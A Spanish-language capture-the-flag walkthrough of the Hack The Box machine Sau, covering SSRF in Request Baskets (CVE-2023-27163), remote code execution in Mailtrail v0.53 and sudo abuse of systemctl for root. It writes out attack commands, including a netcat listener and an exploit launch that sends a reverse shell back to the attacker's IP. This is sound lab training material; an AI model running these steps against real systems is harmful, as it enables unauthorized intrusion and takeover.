Walkthrough — Sau (Hack The Box)

Walkthrough para la máquina Sau de HTB, enfocada en SSRF y explotación de servicios web vulnerables.


Introducción

Sau es una máquina de nivel Easy en Hack The Box. La clave está en identificar puertos poco comunes y explotar un SSRF en un servicio vulnerable.

  • SO: Linux
  • Dificultad: Easy
  • Herramientas utilizadas: nmap, ffuf, python, netcat

🔎 Enumeración inicial

Realicé un escaneo completo con nmap:

nmap -sC -sV -p- -T4 10.10.11.224

Imagen


🌐 Acceso al servicio HTTP

Descubrí que el puerto 55555 tiene un servicio web corriendo. Se trata de Request Baskets:

Imagen


Al crear una nueva “basket”, se generó un token de autenticación:

Imagen


Y desde ahí se pueden ver las peticiones recibidas:

Imagen


🧬 Vulnerabilidad SSRF – CVE-2023-27163

Buscando información, encontré una vulnerabilidad SSRF en este servicio:

Imagen


Ejecuté el exploit para redirigir una petición hacia 127.0.0.1:

bash ./CVE-2023-27163.sh http://10.10.11.224:55555/ http://127.0.0.1:80

Imagen


Esto me reveló que detrás del servicio estaba corriendo una aplicación llamada Mailtrail:

Imagen


💥 Explotación de Mailtrail v0.53

Utilicé un exploit público para obtener RCE:

Imagen


Preparé un listener con netcat:

nc -lnvp 1234

Imagen


Y lancé el exploit:

python3 exploit.py 10.10.14.16 1234 http://10.10.11.224:55555/rapzjz

Imagen


🐚 Shell recibida

Imagen


Inspeccionando el archivo de configuración de Mailtrail encontré credenciales codificadas (hash SHA256):

Imagen


🏁 Flag de usuario

Navegando al home de puma, encontré user.txt:

Imagen


⬆️ Escalada de privilegios

Con sudo -l, vi que podía ejecutar systemctl status trail.service como root sin contraseña:

Imagen


Esto me permitió lanzar un shell interactivo como root:

Imagen


🏁 Flag de root

Finalmente accedí a la flag root.txt:

Imagen


✅ Resumen final

AcciónResultado
EnumeraciónServicio web en puerto 55555
ExplotaciónSSRF → Mailtrail v0.53
AccesoUsuario puma
EscaladaSudo abuse en systemctl
Flagsuser.txt, root.txt ✔️

Autor: gueco99
🧠 Hack the Box – Sau (Easy)